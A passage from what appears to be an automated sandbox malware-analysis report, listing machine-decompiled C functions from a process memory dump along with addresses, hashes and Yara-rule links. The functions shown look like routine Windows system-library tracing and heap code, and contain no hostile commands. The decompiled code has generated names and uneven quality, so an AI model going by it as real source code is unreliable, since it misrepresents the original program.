					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                          0x0493138a
                          0x0493138a
                          0x04931399
                          0x049313a3
                          0x049313a8
                          0x049313aa
                          0x049313b5
                          0x049313bb
                          0x049313c3
                          0x049313c6
                          0x049313c9
                          0x049313d4
                          0x049313e6
                          0x049313d6
                          0x049313df
                          0x049313df
                          0x049313f1
                          0x049313f2
                          0x049313f4
                          0x049313f9
                          0x0493140e

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb3d83d7d5c4505dc9dbb663d73f689e87d0b35d8f78976067f8e1fb6f518758
                          • Instruction ID: b82fba130330b49faebd697d0fa97e9783593effa7bc376506d8218319717080
                          • Opcode Fuzzy Hash: eb3d83d7d5c4505dc9dbb663d73f689e87d0b35d8f78976067f8e1fb6f518758
                          • Instruction Fuzzy Hash: 0D018071A01248AFDB04DFADD842EAEBBB8EF45714F004566F940EB380D6B4AE40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488B02A, Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0488B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04897D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E048F7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                          0x0488b037
                          0x0488b039
                          0x0488b03b
                          0x0488b040
                          0x048da60e
                          0x00000000
                          0x00000000
                          0x048da61d
                          0x0488b04b
                          0x0488b04e
                          0x048da627
                          0x048da634
                          0x00000000
                          0x00000000
                          0x048da641
                          0x048da653
                          0x048da643
                          0x048da64c
                          0x048da64c
                          0x048da65b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048da66c
                          0x0488b057
                          0x0488b057
                          0x0488b057
                          0x0488b046
                          0x0488b046
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                          • Instruction ID: 2c8e4bd1e53b3a1917db3cf35af349d7a22341f82ecd54dade077d986cf7da76
                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                          • Instruction Fuzzy Hash: C201DF32301984DFE326EB1CD888F6677D8EB81B58F0909A5F919CBA51E768FC40C221
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04941074, Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E04941074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0494165E(__ebx, 0x4968ae4, (__edx -  *0x4968b04 >> 0x14) + (__edx -  *0x4968b04 >> 0x14), __edi, __ecx, (__edx -  *0x4968b04 >> 0x14) + (__edx -  *0x4968b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0493AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04897D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0492FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                          0x04941074
                          0x04941080
                          0x04941082
                          0x0494108a
                          0x0494108f
                          0x04941093
                          0x049410ab
                          0x049410ab
                          0x049410c3
                          0x049410cf
                          0x049410e1
                          0x049410d1
                          0x049410da
                          0x049410da
                          0x049410e9
                          0x049410f5
                          0x049410f5
                          0x049410fe

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9be235edad05ee97e00458fff28fb1342b13e7cba293e3548657023ac7fe9e98
                          • Instruction ID: 33c4ed6ed9888b96a7f97cd498b9c455f021a7194b061636813ddd3ea453867d
                          • Opcode Fuzzy Hash: 9be235edad05ee97e00458fff28fb1342b13e7cba293e3548657023ac7fe9e98
                          • Instruction Fuzzy Hash: 71014772604741DFD711EF68C909F1A77E9ABC4318F048A39F88683694EE70F880CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0492FEC0, Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E0492FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x496d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048BFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04897D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                          0x0492fec0
                          0x0492fec0
                          0x0492fecf
                          0x0492fed9
                          0x0492fede
                          0x0492fee0
                          0x0492feeb
                          0x0492fef3
                          0x0492fef6
                          0x0492fef9
                          0x0492ff04
                          0x0492ff16
                          0x0492ff06
                          0x0492ff0f
                          0x0492ff0f
                          0x0492ff21
                          0x0492ff22
                          0x0492ff24
                          0x0492ff29
                          0x0492ff3e

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cf7002855d2f6836a8d69a66b5782b5def8ea74652e2f29f5f032f1bc0870dc
                          • Instruction ID: 7c00cf9b90ce5567e2e561592a6076b510d7a3033823acc00ae256302741b688
                          • Opcode Fuzzy Hash: 6cf7002855d2f6836a8d69a66b5782b5def8ea74652e2f29f5f032f1bc0870dc
                          • Instruction Fuzzy Hash: 9701B171E00218AFDB14DBADD845EAFBBB8EB45704F004166FA00EB380EA74AA00C7D5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0492FE3F, Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E0492FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x496d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E048BFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04897D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                          0x0492fe3f
                          0x0492fe3f
                          0x0492fe4e
                          0x0492fe58
                          0x0492fe5d
                          0x0492fe5f
                          0x0492fe6a
                          0x0492fe72
                          0x0492fe75
                          0x0492fe78
                          0x0492fe83
                          0x0492fe95
                          0x0492fe85
                          0x0492fe8e
                          0x0492fe8e
                          0x0492fea0
                          0x0492fea1
                          0x0492fea3
                          0x0492fea8
                          0x0492febd

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b8b2c462503e4e19a5f011e583f20833791c49844befca4246925a5b1077a55
                          • Instruction ID: 56d2bb8b16c0c5159b3fd09f06557f165ae90411bc9a7f8240eaa8a566b8562b
                          • Opcode Fuzzy Hash: 4b8b2c462503e4e19a5f011e583f20833791c49844befca4246925a5b1077a55
                          • Instruction Fuzzy Hash: B701B171E00258AFDB14DBADD805EAEBBB8EF40704F004566F900EB380DA74A900C7D5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948ED6, Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          C-Code - Quality: 54%
                          			E04948ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x496d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04897D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                          0x04948ed6
                          0x04948ee5
                          0x04948eed
                          0x04948ef0
                          0x04948efa
                          0x04948f03
                          0x04948f0c
                          0x04948f15
                          0x04948f24
                          0x04948f27
                          0x04948f31
                          0x04948f43
                          0x04948f33
                          0x04948f3c
                          0x04948f3c
                          0x04948f4e
                          0x04948f4f
                          0x04948f51
                          0x04948f56
                          0x04948f69

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cec81943941c01b1e27149417d193fe2122b36c781960f6816aaa29864757a70
                          • Instruction ID: 12bea1f21f34e3139c6770a93ee76be7c831536538dbb6ab439837b57935b982
                          • Opcode Fuzzy Hash: cec81943941c01b1e27149417d193fe2122b36c781960f6816aaa29864757a70
                          • Instruction Fuzzy Hash: 0E110C70E006499FDB04DFA9D541AAEBBF4FB08704F1446BAE518EB781E674A940CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948A62, Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          C-Code - Quality: 54%
                          			E04948A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x496d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04897D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048BB640(E048B9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                          0x04948a62
                          0x04948a71
                          0x04948a79
                          0x04948a82
                          0x04948a85
                          0x04948a89
                          0x04948a8c
                          0x04948a8f
                          0x04948a92
                          0x04948a95
                          0x04948a9f
                          0x04948ab1
                          0x04948aa1
                          0x04948aaa
                          0x04948aaa
                          0x04948abc
                          0x04948abd
                          0x04948abf
                          0x04948ac4
                          0x04948ada

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb6f0bde664d29ec6ea9a0d2b245f323d504eeeb66cd89e531bfca86621faf63
                          • Instruction ID: 8df88e973605f7def8a068104ae8e2daed556e8900e70e39c494baae87ab02af
                          • Opcode Fuzzy Hash: bb6f0bde664d29ec6ea9a0d2b245f323d504eeeb66cd89e531bfca86621faf63
                          • Instruction Fuzzy Hash: 34015E71A002189FDB00DFA9D9419EEB7B8EF49310F14456AFA00E7340D674AD008BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487DB60, Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0487DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0487DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0487E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0487E8B0(__ecx, _t14, 0xfff);
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                          0x0487db64
                          0x0487db66
                          0x0487db6b
                          0x0487dbaa
                          0x0487db71
                          0x0487db76
                          0x0487db7a
                          0x0487dba3
                          0x0487db7c
                          0x0487db87
                          0x0487db8b
                          0x048d4fa1
                          0x048d4fb3
                          0x048d4fb8
                          0x0487db91
                          0x0487db96
                          0x0487db98
                          0x0487db98
                          0x0487db8b
                          0x0487db7a
                          0x0487db9d
                          0x0487dba2

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                          • Instruction ID: f8b9b6c35e5b7aebd8f7feb77734a6595c500bec6c8940aa048b9a7fffa4581e
                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                          • Instruction Fuzzy Hash: 4CF0C833201522DBE7725A5948A0F2BA6D58FD1B68F150A35B105DB244CAB0EC02A6D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487B1E1, Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0487B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04897D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04897D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E048F7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                          0x0487b1e8
                          0x0487b1ea
                          0x0487b1f3
                          0x048d4a17
                          0x0487b1f9
                          0x0487b1f9
                          0x0487b1f9
                          0x0487b201
                          0x048d4a21
                          0x048d4a2e
                          0x00000000
                          0x00000000
                          0x048d4a3b
                          0x048d4a4d
                          0x048d4a3d
                          0x048d4a46
                          0x048d4a46
                          0x048d4a55
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0487b20a
                          0x0487b20a
                          0x0487b20a
                          0x0487b20a

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                          • Instruction ID: 0e694dfbfbc57b40ced1e5002526cb0b479b44973f770cbdc4c72f702b4e5ca8
                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                          • Instruction Fuzzy Hash: F201D632212584DBD722975DC804F697BDAEF41758F0C4961FA14CB6B5E774F840C215
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0490FE87, Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          C-Code - Quality: 46%
                          			E0490FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x496d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04897D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                          0x0490fe96
                          0x0490fe9e
                          0x0490fea1
                          0x0490fead
                          0x0490feb3
                          0x0490feb9
                          0x0490fec3
                          0x0490fed5
                          0x0490fec5
                          0x0490fece
                          0x0490fece
                          0x0490fee0
                          0x0490fee1
                          0x0490fee3
                          0x0490fee8
                          0x0490fefb

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5dcb49dc7d7a21e63c64c174e4ce51e7a51bb3caf317c7d3b8a90839ae91882
                          • Instruction ID: a76b3d631c171285c86ad17c3a4ba65cd85cbd495c34bc7fd40bf1143745d15e
                          • Opcode Fuzzy Hash: b5dcb49dc7d7a21e63c64c174e4ce51e7a51bb3caf317c7d3b8a90839ae91882
                          • Instruction Fuzzy Hash: B8016270A00248EFCB14DFACD545A6EB7F4EF05304F144569E554EB382D675EE01CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0493131B, Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          C-Code - Quality: 48%
                          			E0493131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x496d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04897D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                          0x0493131b
                          0x0493132a
                          0x04931330
                          0x04931336
                          0x0493133e
                          0x04931341
                          0x04931344
                          0x0493134f
                          0x04931361
                          0x04931351
                          0x0493135a
                          0x0493135a
                          0x0493136c
                          0x0493136d
                          0x0493136f
                          0x04931374
                          0x04931387

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76d4933b982b3088571f3a3a1914717c8401b9dbe0d1a40bf67b53aa6b72f7c2
                          • Instruction ID: def4eb28e02f475735b589fd833c234ef43c74224f12ab7993442784acabc73f
                          • Opcode Fuzzy Hash: 76d4933b982b3088571f3a3a1914717c8401b9dbe0d1a40bf67b53aa6b72f7c2
                          • Instruction Fuzzy Hash: F6018C70E01248AFCB04EFADD545AAEB7F4FF09300F00456AF845EB391E674AA00CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04948F6A, Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          C-Code - Quality: 48%
                          			E04948F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x496d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04897D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E048BB640(E048B9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                          0x04948f6a
                          0x04948f79
                          0x04948f81
                          0x04948f84
                          0x04948f8b
                          0x04948f91
                          0x04948f94
                          0x04948f9e
                          0x04948fb0
                          0x04948fa0
                          0x04948fa9
                          0x04948fa9
                          0x04948fbb
                          0x04948fbc
                          0x04948fbe
                          0x04948fc3
                          0x04948fd6

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2f86bf09b73aac47354bc6ec70a938a937779100f86b6fe577f0d649ef3006f
                          • Instruction ID: ef383c7d4a1e03e6785cf9e27a369bb085cdfc421780ee1d174fef9a7f2bcae2
                          • Opcode Fuzzy Hash: f2f86bf09b73aac47354bc6ec70a938a937779100f86b6fe577f0d649ef3006f
                          • Instruction Fuzzy Hash: 4D013174A01248AFDB04EFA8D545EAEBBF4EF48304F104569F955EB380EA74EA00CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489C577, Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0489C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0489C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x48511cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E049488F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                          0x0489c577
                          0x0489c57d
                          0x0489c581
                          0x0489c5b5
                          0x0489c5b9
                          0x0489c5ce
                          0x0489c5ce
                          0x0489c5ca
                          0x00000000
                          0x0489c5ca
                          0x0489c5c4
                          0x0489c5c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0489c5ad
                          0x00000000
                          0x0489c5af

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e6c1fbc6a2ced1801af2e1f8360e8bd8c6e58b224721185ca31081d73abf601
                          • Instruction ID: e0bbd54c784c9a49dad5d9bfe0b31f0a78f77671e3b941da7db48bfb5a30e29f
                          • Opcode Fuzzy Hash: 1e6c1fbc6a2ced1801af2e1f8360e8bd8c6e58b224721185ca31081d73abf601
                          • Instruction Fuzzy Hash: 15F0CDB2951A948AEFA19A188404B227FD4BB84274F4C8E66D405C3201C2A2FC80C241
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04932073, Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E04932073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0492FD22(__ecx);
				_t19 =  *0x496849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4968748; // 0x0
					if(__eflags <= 0) {
						E04931C06();
